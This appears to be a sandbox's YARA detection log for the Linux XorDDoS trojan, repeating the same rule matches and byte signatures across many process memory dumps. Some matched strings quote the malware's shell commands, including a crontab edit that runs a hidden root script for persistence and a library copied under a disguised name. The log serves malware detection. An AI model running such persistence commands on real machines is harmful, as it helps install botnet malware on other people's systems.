6351.1.0000000008048000.00000000080cf000.r-x.sdmp	MALWARE_Linux_XORDDoS	Detects XORDDoS	ditekSHen	0x863fb:$s1: for i in `cat /proc/net/dev\|grep :\|awk -F: {'print $1'}`; do ifconfig $i up& done 0x8644d:$s2: cp /lib/libudev.so /lib/libudev.so.6 0x6ad30:$s3: sed -i '/\/etc\/cron.hourly\/gcc.sh/d' /etc/crontab && echo '/3 * * * root /etc/cron.hourly/gcc.sh' >> /etc/crontab 0x6ae29:$s4: User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; SV1; TencentTraveler ; .NET CLR 1.1.4322)
6532.1.0000000008048000.00000000080cf000.r-x.sdmp	JoeSecurity_XorDDoS	Yara detected XorDDoS Bot	Joe Security
6532.1.0000000008048000.00000000080cf000.r-x.sdmp	Linux_Trojan_Xorddos_2aef46a6	unknown	unknown	0x6af99:$a: 25 64 2D 2D 25 73 5F 25 64 3A 25 73
6532.1.0000000008048000.00000000080cf000.r-x.sdmp	Linux_Trojan_Xorddos_0eb147ca	unknown	unknown	0x2960:$a: 83 45 F0 01 8B 45 F0 89 45 E8 8B 45 E8 83 C4 18 5F 5D C3 55 0x29e3:$a: 83 45 F0 01 8B 45 F0 89 45 E8 8B 45 E8 83 C4 18 5F 5D C3 55
6532.1.0000000008048000.00000000080cf000.r-x.sdmp	Linux_Trojan_Xorddos_884cab60	unknown	unknown	0x8ed2:$a: E4 8B 51 64 F6 C2 10 75 12 89 CB 89 D1 83 C9 40 89 D0 F0 0F B1 0x8f3a:$a: E4 8B 51 64 F6 C2 10 75 12 89 CB 89 D1 83 C9 40 89 D0 F0 0F B1
6532.1.0000000008048000.00000000080cf000.r-x.sdmp	Linux_Trojan_Xorddos_ba961ed2	unknown	unknown	0x26d8:$a: F8 C9 C3 55 89 E5 83 EC 38 C7 45 F8 FF FF FF FF C7 45 FC FF FF
6532.1.0000000008048000.00000000080cf000.r-x.sdmp	Linux_Trojan_Xorddos_2084099a	unknown	unknown	0x79d3:$a: 8B 45 FC 8B 50 18 8B 45 08 89 50 18 8B 45 FC 8B 40 08 85 C0
6532.1.0000000008048000.00000000080cf000.r-x.sdmp	MALWARE_Linux_XORDDoS	Detects XORDDoS	ditekSHen	0x863fb:$s1: for i in `cat /proc/net/dev\|grep :\|awk -F: {'print $1'}`; do ifconfig $i up& done 0x8644d:$s2: cp /lib/libudev.so /lib/libudev.so.6 0x6ad30:$s3: sed -i '/\/etc\/cron.hourly\/gcc.sh/d' /etc/crontab && echo '/3 * * * root /etc/cron.hourly/gcc.sh' >> /etc/crontab 0x6ae29:$s4: User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; SV1; TencentTraveler ; .NET CLR 1.1.4322)
6472.1.0000000008048000.00000000080cf000.r-x.sdmp	JoeSecurity_XorDDoS	Yara detected XorDDoS Bot	Joe Security
6472.1.0000000008048000.00000000080cf000.r-x.sdmp	Linux_Trojan_Xorddos_2aef46a6	unknown	unknown	0x6af99:$a: 25 64 2D 2D 25 73 5F 25 64 3A 25 73
6472.1.0000000008048000.00000000080cf000.r-x.sdmp	Linux_Trojan_Xorddos_0eb147ca	unknown	unknown	0x2960:$a: 83 45 F0 01 8B 45 F0 89 45 E8 8B 45 E8 83 C4 18 5F 5D C3 55 0x29e3:$a: 83 45 F0 01 8B 45 F0 89 45 E8 8B 45 E8 83 C4 18 5F 5D C3 55
6472.1.0000000008048000.00000000080cf000.r-x.sdmp	Linux_Trojan_Xorddos_884cab60	unknown	unknown	0x8ed2:$a: E4 8B 51 64 F6 C2 10 75 12 89 CB 89 D1 83 C9 40 89 D0 F0 0F B1 0x8f3a:$a: E4 8B 51 64 F6 C2 10 75 12 89 CB 89 D1 83 C9 40 89 D0 F0 0F B1
6472.1.0000000008048000.00000000080cf000.r-x.sdmp	Linux_Trojan_Xorddos_ba961ed2	unknown	unknown	0x26d8:$a: F8 C9 C3 55 89 E5 83 EC 38 C7 45 F8 FF FF FF FF C7 45 FC FF FF
6472.1.0000000008048000.00000000080cf000.r-x.sdmp	Linux_Trojan_Xorddos_2084099a	unknown	unknown	0x79d3:$a: 8B 45 FC 8B 50 18 8B 45 08 89 50 18 8B 45 FC 8B 40 08 85 C0
6472.1.0000000008048000.00000000080cf000.r-x.sdmp	MALWARE_Linux_XORDDoS	Detects XORDDoS	ditekSHen	0x863fb:$s1: for i in `cat /proc/net/dev\|grep :\|awk -F: {'print $1'}`; do ifconfig $i up& done 0x8644d:$s2: cp /lib/libudev.so /lib/libudev.so.6 0x6ad30:$s3: sed -i '/\/etc\/cron.hourly\/gcc.sh/d' /etc/crontab && echo '/3 * * * root /etc/cron.hourly/gcc.sh' >> /etc/crontab 0x6ae29:$s4: User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; SV1; TencentTraveler ; .NET CLR 1.1.4322)
6401.1.0000000008048000.00000000080cf000.r-x.sdmp	JoeSecurity_XorDDoS	Yara detected XorDDoS Bot	Joe Security
6401.1.0000000008048000.00000000080cf000.r-x.sdmp	Linux_Trojan_Xorddos_2aef46a6	unknown	unknown	0x6af99:$a: 25 64 2D 2D 25 73 5F 25 64 3A 25 73
6401.1.0000000008048000.00000000080cf000.r-x.sdmp	Linux_Trojan_Xorddos_0eb147ca	unknown	unknown	0x2960:$a: 83 45 F0 01 8B 45 F0 89 45 E8 8B 45 E8 83 C4 18 5F 5D C3 55 0x29e3:$a: 83 45 F0 01 8B 45 F0 89 45 E8 8B 45 E8 83 C4 18 5F 5D C3 55
6401.1.0000000008048000.00000000080cf000.r-x.sdmp	Linux_Trojan_Xorddos_884cab60	unknown	unknown	0x8ed2:$a: E4 8B 51 64 F6 C2 10 75 12 89 CB 89 D1 83 C9 40 89 D0 F0 0F B1 0x8f3a:$a: E4 8B 51 64 F6 C2 10 75 12 89 CB 89 D1 83 C9 40 89 D0 F0 0F B1
6401.1.0000000008048000.00000000080cf000.r-x.sdmp	Linux_Trojan_Xorddos_ba961ed2	unknown	unknown	0x26d8:$a: F8 C9 C3 55 89 E5 83 EC 38 C7 45 F8 FF FF FF FF C7 45 FC FF FF
6401.1.0000000008048000.00000000080cf000.r-x.sdmp	Linux_Trojan_Xorddos_2084099a	unknown	unknown	0x79d3:$a: 8B 45 FC 8B 50 18 8B 45 08 89 50 18 8B 45 FC 8B 40 08 85 C0
6401.1.0000000008048000.00000000080cf000.r-x.sdmp	MALWARE_Linux_XORDDoS	Detects XORDDoS	ditekSHen	0x863fb:$s1: for i in `cat /proc/net/dev\|grep :\|awk -F: {'print $1'}`; do ifconfig $i up& done 0x8644d:$s2: cp /lib/libudev.so /lib/libudev.so.6 0x6ad30:$s3: sed -i '/\/etc\/cron.hourly\/gcc.sh/d' /etc/crontab && echo '/3 * * * root /etc/cron.hourly/gcc.sh' >> /etc/crontab 0x6ae29:$s4: User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; SV1; TencentTraveler ; .NET CLR 1.1.4322)
6375.1.0000000008048000.00000000080cf000.r-x.sdmp	JoeSecurity_XorDDoS	Yara detected XorDDoS Bot	Joe Security
6375.1.0000000008048000.00000000080cf000.r-x.sdmp	Linux_Trojan_Xorddos_2aef46a6	unknown	unknown	0x6af99:$a: 25 64 2D 2D 25 73 5F 25 64 3A 25 73
6375.1.0000000008048000.00000000080cf000.r-x.sdmp	Linux_Trojan_Xorddos_0eb147ca	unknown	unknown	0x2960:$a: 83 45 F0 01 8B 45 F0 89 45 E8 8B 45 E8 83 C4 18 5F 5D C3 55 0x29e3:$a: 83 45 F0 01 8B 45 F0 89 45 E8 8B 45 E8 83 C4 18 5F 5D C3 55
6375.1.0000000008048000.00000000080cf000.r-x.sdmp	Linux_Trojan_Xorddos_884cab60	unknown	unknown	0x8ed2:$a: E4 8B 51 64 F6 C2 10 75 12 89 CB 89 D1 83 C9 40 89 D0 F0 0F B1 0x8f3a:$a: E4 8B 51 64 F6 C2 10 75 12 89 CB 89 D1 83 C9 40 89 D0 F0 0F B1
6375.1.0000000008048000.00000000080cf000.r-x.sdmp	Linux_Trojan_Xorddos_ba961ed2	unknown	unknown	0x26d8:$a: F8 C9 C3 55 89 E5 83 EC 38 C7 45 F8 FF FF FF FF C7 45 FC FF FF
6375.1.0000000008048000.00000000080cf000.r-x.sdmp	Linux_Trojan_Xorddos_2084099a	unknown	unknown	0x79d3:$a: 8B 45 FC 8B 50 18 8B 45 08 89 50 18 8B 45 FC 8B 40 08 85 C0
6375.1.0000000008048000.00000000080cf000.r-x.sdmp	MALWARE_Linux_XORDDoS	Detects XORDDoS	ditekSHen	0x863fb:$s1: for i in `cat /proc/net/dev\|grep :\|awk -F: {'print $1'}`; do ifconfig $i up& done 0x8644d:$s2: cp /lib/libudev.so /lib/libudev.so.6 0x6ad30:$s3: sed -i '/\/etc\/cron.hourly\/gcc.sh/d' /etc/crontab && echo '/3 * * * root /etc/cron.hourly/gcc.sh' >> /etc/crontab 0x6ae29:$s4: User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; SV1; TencentTraveler ; .NET CLR 1.1.4322)
6372.1.0000000008048000.00000000080cf000.r-x.sdmp	JoeSecurity_XorDDoS	Yara detected XorDDoS Bot	Joe Security
6372.1.0000000008048000.00000000080cf000.r-x.sdmp	Linux_Trojan_Xorddos_2aef46a6	unknown	unknown	0x6af99:$a: 25 64 2D 2D 25 73 5F 25 64 3A 25 73
6372.1.0000000008048000.00000000080cf000.r-x.sdmp	Linux_Trojan_Xorddos_0eb147ca	unknown	unknown	0x2960:$a: 83 45 F0 01 8B 45 F0 89 45 E8 8B 45 E8 83 C4 18 5F 5D C3 55 0x29e3:$a: 83 45 F0 01 8B 45 F0 89 45 E8 8B 45 E8 83 C4 18 5F 5D C3 55
6372.1.0000000008048000.00000000080cf000.r-x.sdmp	Linux_Trojan_Xorddos_884cab60	unknown	unknown	0x8ed2:$a: E4 8B 51 64 F6 C2 10 75 12 89 CB 89 D1 83 C9 40 89 D0 F0 0F B1 0x8f3a:$a: E4 8B 51 64 F6 C2 10 75 12 89 CB 89 D1 83 C9 40 89 D0 F0 0F B1
6372.1.0000000008048000.00000000080cf000.r-x.sdmp	Linux_Trojan_Xorddos_ba961ed2	unknown	unknown	0x26d8:$a: F8 C9 C3 55 89 E5 83 EC 38 C7 45 F8 FF FF FF FF C7 45 FC FF FF
6372.1.0000000008048000.00000000080cf000.r-x.sdmp	Linux_Trojan_Xorddos_2084099a	unknown	unknown	0x79d3:$a: 8B 45 FC 8B 50 18 8B 45 08 89 50 18 8B 45 FC 8B 40 08 85 C0
6372.1.0000000008048000.00000000080cf000.r-x.sdmp	MALWARE_Linux_XORDDoS	Detects XORDDoS	ditekSHen	0x863fb:$s1: for i in `cat /proc/net/dev\|grep :\|awk -F: {'print $1'}`; do ifconfig $i up& done 0x8644d:$s2: cp /lib/libudev.so /lib/libudev.so.6 0x6ad30:$s3: sed -i '/\/etc\/cron.hourly\/gcc.sh/d' /etc/crontab && echo '/3 * * * root /etc/cron.hourly/gcc.sh' >> /etc/crontab 0x6ae29:$s4: User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; SV1; TencentTraveler ; .NET CLR 1.1.4322)
6540.1.0000000008048000.00000000080cf000.r-x.sdmp	JoeSecurity_XorDDoS	Yara detected XorDDoS Bot	Joe Security
6540.1.0000000008048000.00000000080cf000.r-x.sdmp	Linux_Trojan_Xorddos_2aef46a6	unknown	unknown	0x6af99:$a: 25 64 2D 2D 25 73 5F 25 64 3A 25 73
6540.1.0000000008048000.00000000080cf000.r-x.sdmp	Linux_Trojan_Xorddos_0eb147ca	unknown	unknown	0x2960:$a: 83 45 F0 01 8B 45 F0 89 45 E8 8B 45 E8 83 C4 18 5F 5D C3 55 0x29e3:$a: 83 45 F0 01 8B 45 F0 89 45 E8 8B 45 E8 83 C4 18 5F 5D C3 55
6540.1.0000000008048000.00000000080cf000.r-x.sdmp	Linux_Trojan_Xorddos_884cab60	unknown	unknown	0x8ed2:$a: E4 8B 51 64 F6 C2 10 75 12 89 CB 89 D1 83 C9 40 89 D0 F0 0F B1 0x8f3a:$a: E4 8B 51 64 F6 C2 10 75 12 89 CB 89 D1 83 C9 40 89 D0 F0 0F B1
6540.1.0000000008048000.00000000080cf000.r-x.sdmp	Linux_Trojan_Xorddos_ba961ed2	unknown	unknown	0x26d8:$a: F8 C9 C3 55 89 E5 83 EC 38 C7 45 F8 FF FF FF FF C7 45 FC FF FF
6540.1.0000000008048000.00000000080cf000.r-x.sdmp	Linux_Trojan_Xorddos_2084099a	unknown	unknown	0x79d3:$a: 8B 45 FC 8B 50 18 8B 45 08 89 50 18 8B 45 FC 8B 40 08 85 C0
6540.1.0000000008048000.00000000080cf000.r-x.sdmp	MALWARE_Linux_XORDDoS	Detects XORDDoS	ditekSHen	0x863fb:$s1: for i in `cat /proc/net/dev\|grep :\|awk -F: {'print $1'}`; do ifconfig $i up& done 0x8644d:$s2: cp /lib/libudev.so /lib/libudev.so.6 0x6ad30:$s3: sed -i '/\/etc\/cron.hourly\/gcc.sh/d' /etc/crontab && echo '/3 * * * root /etc/cron.hourly/gcc.sh' >> /etc/crontab 0x6ae29:$s4: User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; SV1; TencentTraveler ; .NET CLR 1.1.4322)
6469.1.0000000008048000.00000000080cf000.r-x.sdmp	JoeSecurity_XorDDoS	Yara detected XorDDoS Bot	Joe Security
6469.1.0000000008048000.00000000080cf000.r-x.sdmp	Linux_Trojan_Xorddos_2aef46a6	unknown	unknown	0x6af99:$a: 25 64 2D 2D 25 73 5F 25 64 3A 25 73
6469.1.0000000008048000.00000000080cf000.r-x.sdmp	Linux_Trojan_Xorddos_0eb147ca	unknown	unknown	0x2960:$a: 83 45 F0 01 8B 45 F0 89 45 E8 8B 45 E8 83 C4 18 5F 5D C3 55 0x29e3:$a: 83 45 F0 01 8B 45 F0 89 45 E8 8B 45 E8 83 C4 18 5F 5D C3 55
6469.1.0000000008048000.00000000080cf000.r-x.sdmp	Linux_Trojan_Xorddos_884cab60	unknown	unknown	0x8ed2:$a: E4 8B 51 64 F6 C2 10 75 12 89 CB 89 D1 83 C9 40 89 D0 F0 0F B1 0x8f3a:$a: E4 8B 51 64 F6 C2 10 75 12 89 CB 89 D1 83 C9 40 89 D0 F0 0F B1
6469.1.0000000008048000.00000000080cf000.r-x.sdmp	Linux_Trojan_Xorddos_ba961ed2	unknown	unknown	0x26d8:$a: F8 C9 C3 55 89 E5 83 EC 38 C7 45 F8 FF FF FF FF C7 45 FC FF FF
6469.1.0000000008048000.00000000080cf000.r-x.sdmp	Linux_Trojan_Xorddos_2084099a	unknown	unknown	0x79d3:$a: 8B 45 FC 8B 50 18 8B 45 08 89 50 18 8B 45 FC 8B 40 08 85 C0
6469.1.0000000008048000.00000000080cf000.r-x.sdmp	MALWARE_Linux_XORDDoS	Detects XORDDoS	ditekSHen	0x863fb:$s1: for i in `cat /proc/net/dev\|grep :\|awk -F: {'print $1'}`; do ifconfig $i up& done 0x8644d:$s2: cp /lib/libudev.so /lib/libudev.so.6 0x6ad30:$s3: sed -i '/\/etc\/cron.hourly\/gcc.sh/d' /etc/crontab && echo '/3 * * * root /etc/cron.hourly/gcc.sh' >> /etc/crontab 0x6ae29:$s4: User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; SV1; TencentTraveler ; .NET CLR 1.1.4322)
6523.1.0000000008048000.00000000080cf000.r-x.sdmp	JoeSecurity_XorDDoS	Yara detected XorDDoS Bot	Joe Security
6523.1.0000000008048000.00000000080cf000.r-x.sdmp	Linux_Trojan_Xorddos_2aef46a6	unknown	unknown	0x6af99:$a: 25 64 2D 2D 25 73 5F 25 64 3A 25 73
6523.1.0000000008048000.00000000080cf000.r-x.sdmp	Linux_Trojan_Xorddos_0eb147ca	unknown	unknown	0x2960:$a: 83 45 F0 01 8B 45 F0 89 45 E8 8B 45 E8 83 C4 18 5F 5D C3 55 0x29e3:$a: 83 45 F0 01 8B 45 F0 89 45 E8 8B 45 E8 83 C4 18 5F 5D C3 55
6523.1.0000000008048000.00000000080cf000.r-x.sdmp	Linux_Trojan_Xorddos_884cab60	unknown	unknown	0x8ed2:$a: E4 8B 51 64 F6 C2 10 75 12 89 CB 89 D1 83 C9 40 89 D0 F0 0F B1 0x8f3a:$a: E4 8B 51 64 F6 C2 10 75 12 89 CB 89 D1 83 C9 40 89 D0 F0 0F B1
6523.1.0000000008048000.00000000080cf000.r-x.sdmp	Linux_Trojan_Xorddos_ba961ed2	unknown	unknown	0x26d8:$a: F8 C9 C3 55 89 E5 83 EC 38 C7 45 F8 FF FF FF FF C7 45 FC FF FF
6523.1.0000000008048000.00000000080cf000.r-x.sdmp	Linux_Trojan_Xorddos_2084099a	unknown	unknown	0x79d3:$a: 8B 45 FC 8B 50 18 8B 45 08 89 50 18 8B 45 FC 8B 40 08 85 C0
6523.1.0000000008048000.00000000080cf000.r-x.sdmp	MALWARE_Linux_XORDDoS	Detects XORDDoS	ditekSHen	0x863fb:$s1: for i in `cat /proc/net/dev\|grep :\|awk -F: {'print $1'}`; do ifconfig $i up& done 0x8644d:$s2: cp /lib/libudev.so /lib/libudev.so.6 0x6ad30:$s3: sed -i '/\/etc\/cron.hourly\/gcc.sh/d' /etc/crontab && echo '/3 * * * root /etc/cron.hourly/gcc.sh' >> /etc/crontab 0x6ae29:$s4: User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; SV1; TencentTraveler ; .NET CLR 1.1.4322)
6506.1.0000000008048000.00000000080cf000.r-x.sdmp	JoeSecurity_XorDDoS	Yara detected XorDDoS Bot	Joe Security
6506.1.0000000008048000.00000000080cf000.r-x.sdmp	Linux_Trojan_Xorddos_2aef46a6	unknown	unknown	0x6af99:$a: 25 64 2D 2D 25 73 5F 25 64 3A 25 73
6506.1.0000000008048000.00000000080cf000.r-x.sdmp	Linux_Trojan_Xorddos_0eb147ca	unknown	unknown	0x2960:$a: 83 45 F0 01 8B 45 F0 89 45 E8 8B 45 E8 83 C4 18 5F 5D C3 55 0x29e3:$a: 83 45 F0 01 8B 45 F0 89 45 E8 8B 45 E8 83 C4 18 5F 5D C3 55
6506.1.0000000008048000.00000000080cf000.r-x.sdmp	Linux_Trojan_Xorddos_884cab60	unknown	unknown	0x8ed2:$a: E4 8B 51 64 F6 C2 10 75 12 89 CB 89 D1 83 C9 40 89 D0 F0 0F B1 0x8f3a:$a: E4 8B 51 64 F6 C2 10 75 12 89 CB 89 D1 83 C9 40 89 D0 F0 0F B1
6506.1.0000000008048000.00000000080cf000.r-x.sdmp	Linux_Trojan_Xorddos_ba961ed2	unknown	unknown	0x26d8:$a: F8 C9 C3 55 89 E5 83 EC 38 C7 45 F8 FF FF FF FF C7 45 FC FF FF
6506.1.0000000008048000.00000000080cf000.r-x.sdmp	Linux_Trojan_Xorddos_2084099a	unknown	unknown	0x79d3:$a: 8B 45 FC 8B 50 18 8B 45 08 89 50 18 8B 45 FC 8B 40 08 85 C0
6506.1.0000000008048000.00000000080cf000.r-x.sdmp	MALWARE_Linux_XORDDoS	Detects XORDDoS	ditekSHen	0x863fb:$s1: for i in `cat /proc/net/dev\|grep :\|awk -F: {'print $1'}`; do ifconfig $i up& done 0x8644d:$s2: cp /lib/libudev.so /lib/libudev.so.6 0x6ad30:$s3: sed -i '/\/etc\/cron.hourly\/gcc.sh/d' /etc/crontab && echo '/3 * * * root /etc/cron.hourly/gcc.sh' >> /etc/crontab 0x6ae29:$s4: User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; SV1; TencentTraveler ; .NET CLR 1.1.4322)
6457.1.0000000008048000.00000000080cf000.r-x.sdmp	JoeSecurity_XorDDoS	Yara detected XorDDoS Bot	Joe Security
6457.1.0000000008048000.00000000080cf000.r-x.sdmp	Linux_Trojan_Xorddos_2aef46a6	unknown	unknown	0x6af99:$a: 25 64 2D 2D 25 73 5F 25 64 3A 25 73
6457.1.0000000008048000.00000000080cf000.r-x.sdmp	Linux_Trojan_Xorddos_0eb147ca	unknown	unknown	0x2960:$a: 83 45 F0 01 8B 45 F0 89 45 E8 8B 45 E8 83 C4 18 5F 5D C3 55 0x29e3:$a: 83 45 F0 01 8B 45 F0 89 45 E8 8B 45 E8 83 C4 18 5F 5D C3 55
6457.1.0000000008048000.00000000080cf000.r-x.sdmp	Linux_Trojan_Xorddos_884cab60	unknown	unknown	0x8ed2:$a: E4 8B 51 64 F6 C2 10 75 12 89 CB 89 D1 83 C9 40 89 D0 F0 0F B1 0x8f3a:$a: E4 8B 51 64 F6 C2 10 75 12 89 CB 89 D1 83 C9 40 89 D0 F0 0F B1
6457.1.0000000008048000.00000000080cf000.r-x.sdmp	Linux_Trojan_Xorddos_ba961ed2	unknown	unknown	0x26d8:$a: F8 C9 C3 55 89 E5 83 EC 38 C7 45 F8 FF FF FF FF C7 45 FC FF FF
6457.1.0000000008048000.00000000080cf000.r-x.sdmp	Linux_Trojan_Xorddos_2084099a	unknown	unknown	0x79d3:$a: 8B 45 FC 8B 50 18 8B 45 08 89 50 18 8B 45 FC 8B 40 08 85 C0
6457.1.0000000008048000.00000000080cf000.r-x.sdmp	MALWARE_Linux_XORDDoS	Detects XORDDoS	ditekSHen	0x863fb:$s1: for i in `cat /proc/net/dev\|grep :\|awk -F: {'print $1'}`; do ifconfig $i up& done 0x8644d:$s2: cp /lib/libudev.so /lib/libudev.so.6 0x6ad30:$s3: sed -i '/\/etc\/cron.hourly\/gcc.sh/d' /etc/crontab && echo '/3 * * * root /etc/cron.hourly/gcc.sh' >> /etc/crontab 0x6ae29:$s4: User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; SV1; TencentTraveler ; .NET CLR 1.1.4322)
6496.1.0000000008048000.00000000080cf000.r-x.sdmp	JoeSecurity_XorDDoS	Yara detected XorDDoS Bot	Joe Security
6496.1.0000000008048000.00000000080cf000.r-x.sdmp	Linux_Trojan_Xorddos_2aef46a6	unknown	unknown	0x6af99:$a: 25 64 2D 2D 25 73 5F 25 64 3A 25 73
6496.1.0000000008048000.00000000080cf000.r-x.sdmp	Linux_Trojan_Xorddos_0eb147ca	unknown	unknown	0x2960:$a: 83 45 F0 01 8B 45 F0 89 45 E8 8B 45 E8 83 C4 18 5F 5D C3 55 0x29e3:$a: 83 45 F0 01 8B 45 F0 89 45 E8 8B 45 E8 83 C4 18 5F 5D C3 55
6496.1.0000000008048000.00000000080cf000.r-x.sdmp	Linux_Trojan_Xorddos_884cab60	unknown	unknown	0x8ed2:$a: E4 8B 51 64 F6 C2 10 75 12 89 CB 89 D1 83 C9 40 89 D0 F0 0F B1 0x8f3a:$a: E4 8B 51 64 F6 C2 10 75 12 89 CB 89 D1 83 C9 40 89 D0 F0 0F B1
6496.1.0000000008048000.00000000080cf000.r-x.sdmp	Linux_Trojan_Xorddos_ba961ed2	unknown	unknown	0x26d8:$a: F8 C9 C3 55 89 E5 83 EC 38 C7 45 F8 FF FF FF FF C7 45 FC FF FF
6496.1.0000000008048000.00000000080cf000.r-x.sdmp	Linux_Trojan_Xorddos_2084099a	unknown	unknown	0x79d3:$a: 8B 45 FC 8B 50 18 8B 45 08 89 50 18 8B 45 FC 8B 40 08 85 C0
6496.1.0000000008048000.00000000080cf000.r-x.sdmp	MALWARE_Linux_XORDDoS	Detects XORDDoS	ditekSHen	0x863fb:$s1: for i in `cat /proc/net/dev\|grep :\|awk -F: {'print $1'}`; do ifconfig $i up& done 0x8644d:$s2: cp /lib/libudev.so /lib/libudev.so.6 0x6ad30:$s3: sed -i '/\/etc\/cron.hourly\/gcc.sh/d' /etc/crontab && echo '/3 * * * root /etc/cron.hourly/gcc.sh' >> /etc/crontab 0x6ae29:$s4: User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; SV1; TencentTraveler ; .NET CLR 1.1.4322)
6550.1.0000000008048000.00000000080cf000.r-x.sdmp	JoeSecurity_XorDDoS	Yara detected XorDDoS Bot	Joe Security
6550.1.0000000008048000.00000000080cf000.r-x.sdmp	Linux_Trojan_Xorddos_2aef46a6	unknown	unknown	0x6af99:$a: 25 64 2D 2D 25 73 5F 25 64 3A 25 73
6550.1.0000000008048000.00000000080cf000.r-x.sdmp	Linux_Trojan_Xorddos_0eb147ca	unknown	unknown	0x2960:$a: 83 45 F0 01 8B 45 F0 89 45 E8 8B 45 E8 83 C4 18 5F 5D C3 55 0x29e3:$a: 83 45 F0 01 8B 45 F0 89 45 E8 8B 45 E8 83 C4 18 5F 5D C3 55
6550.1.0000000008048000.00000000080cf000.r-x.sdmp	Linux_Trojan_Xorddos_884cab60	unknown	unknown	0x8ed2:$a: E4 8B 51 64 F6 C2 10 75 12 89 CB 89 D1 83 C9 40 89 D0 F0 0F B1 0x8f3a:$a: E4 8B 51 64 F6 C2 10 75 12 89 CB 89 D1 83 C9 40 89 D0 F0 0F B1
6550.1.0000000008048000.00000000080cf000.r-x.sdmp	Linux_Trojan_Xorddos_ba961ed2	unknown	unknown	0x26d8:$a: F8 C9 C3 55 89 E5 83 EC 38 C7 45 F8 FF FF FF FF C7 45 FC FF FF
6550.1.0000000008048000.00000000080cf000.r-x.sdmp	Linux_Trojan_Xorddos_2084099a	unknown	unknown	0x79d3:$a: 8B 45 FC 8B 50 18 8B 45 08 89 50 18 8B 45 FC 8B 40 08 85 C0
6550.1.0000000008048000.00000000080cf000.r-x.sdmp	MALWARE_Linux_XORDDoS	Detects XORDDoS	ditekSHen	0x863fb:$s1: for i in `cat /proc/net/dev\|grep :\|awk -F: {'print $1'}`; do ifconfig $i up& done 0x8644d:$s2: cp /lib/libudev.so /lib/libudev.so.6 0x6ad30:$s3: sed -i '/\/etc\/cron.hourly\/gcc.sh/d' /etc/crontab && echo '/3 * * * root /etc/cron.hourly/gcc.sh' >> /etc/crontab 0x6ae29:$s4: User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; SV1; TencentTraveler ; .NET CLR 1.1.4322)
6298.1.0000000008048000.00000000080cf000.r-x.sdmp	JoeSecurity_XorDDoS	Yara detected XorDDoS Bot	Joe Security
6298.1.0000000008048000.00000000080cf000.r-x.sdmp	Linux_Trojan_Xorddos_2aef46a6	unknown	unknown	0x6af99:$a: 25 64 2D 2D 25 73 5F 25 64 3A 25 73
6298.1.0000000008048000.00000000080cf000.r-x.sdmp	Linux_Trojan_Xorddos_0eb147ca	unknown	unknown	0x2960:$a: 83 45 F0 01 8B 45 F0 89 45 E8 8B 45 E8 83 C4 18 5F 5D C3 55 0x29e3:$a: 83 45 F0 01 8B 45 F0 89 45 E8 8B 45 E8 83 C4 18 5F 5D C3 55
6298.1.0000000008048000.00000000080cf000.r-x.sdmp	Linux_Trojan_Xorddos_884cab60	unknown	unknown	0x8ed2:$a: E4 8B 51 64 F6 C2 10 75 12 89 CB 89 D1 83 C9 40 89 D0 F0 0F B1 0x8f3a:$a: E4 8B 51 64 F6 C2 10 75 12 89 CB 89 D1 83 C9 40 89 D0 F0 0F B1
6298.1.0000000008048000.00000000080cf000.r-x.sdmp	Linux_Trojan_Xorddos_ba961ed2	unknown	unknown	0x26d8:$a: F8 C9 C3 55 89 E5 83 EC 38 C7 45 F8 FF FF FF FF C7 45 FC FF FF
6298.1.0000000008048000.00000000080cf000.r-x.sdmp	Linux_Trojan_Xorddos_2084099a	unknown	unknown	0x79d3:$a: 8B 45 FC 8B 50 18 8B 45 08 89 50 18 8B 45 FC 8B 40 08 85 C0
6298.1.0000000008048000.00000000080cf000.r-x.sdmp	MALWARE_Linux_XORDDoS	Detects XORDDoS	ditekSHen	0x863fb:$s1: for i in `cat /proc/net/dev\|grep :\|awk -F: {'print $1'}`; do ifconfig $i up& done 0x8644d:$s2: cp /lib/libudev.so /lib/libudev.so.6 0x6ad30:$s3: sed -i '/\/etc\/cron.hourly\/gcc.sh/d' /etc/crontab && echo '/3 * * * root /etc/cron.hourly/gcc.sh' >> /etc/crontab 0x6ae29:$s4: User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; SV1; TencentTraveler ; .NET CLR 1.1.4322)
6288.1.0000000008048000.00000000080cf000.r-x.sdmp	JoeSecurity_XorDDoS	Yara detected XorDDoS Bot	Joe Security
6288.1.0000000008048000.00000000080cf000.r-x.sdmp	Linux_Trojan_Xorddos_2aef46a6	unknown	unknown	0x6af99:$a: 25 64 2D 2D 25 73 5F 25 64 3A 25 73
6288.1.0000000008048000.00000000080cf000.r-x.sdmp	Linux_Trojan_Xorddos_0eb147ca	unknown	unknown	0x2960:$a: 83 45 F0 01 8B 45 F0 89 45 E8 8B 45 E8 83 C4 18 5F 5D C3 55 0x29e3:$a: 83 45 F0 01 8B 45 F0 89 45 E8 8B 45 E8 83 C4 18 5F 5D C3 55
6288.1.0000000008048000.00000000080cf000.r-x.sdmp	Linux_Trojan_Xorddos_884cab60	unknown	unknown	0x8ed2:$a: E4 8B 51 64 F6 C2 10 75 12 89 CB 89 D1 83 C9 40 89 D0 F0 0F B1 0x8f3a:$a: E4 8B 51 64 F6 C2 10 75 12 89 CB 89 D1 83 C9 40 89 D0 F0 0F B1
6288.1.0000000008048000.00000000080cf000.r-x.sdmp	Linux_Trojan_Xorddos_ba961ed2	unknown	unknown	0x26d8:$a: F8 C9 C3 55 89 E5 83 EC 38 C7 45 F8 FF FF FF FF C7 45 FC FF FF
6288.1.0000000008048000.00000000080cf000.r-x.sdmp	Linux_Trojan_Xorddos_2084099a	unknown	unknown	0x79d3:$a: 8B 45 FC 8B 50 18 8B 45 08 89 50 18 8B 45 FC 8B 40 08 85 C0
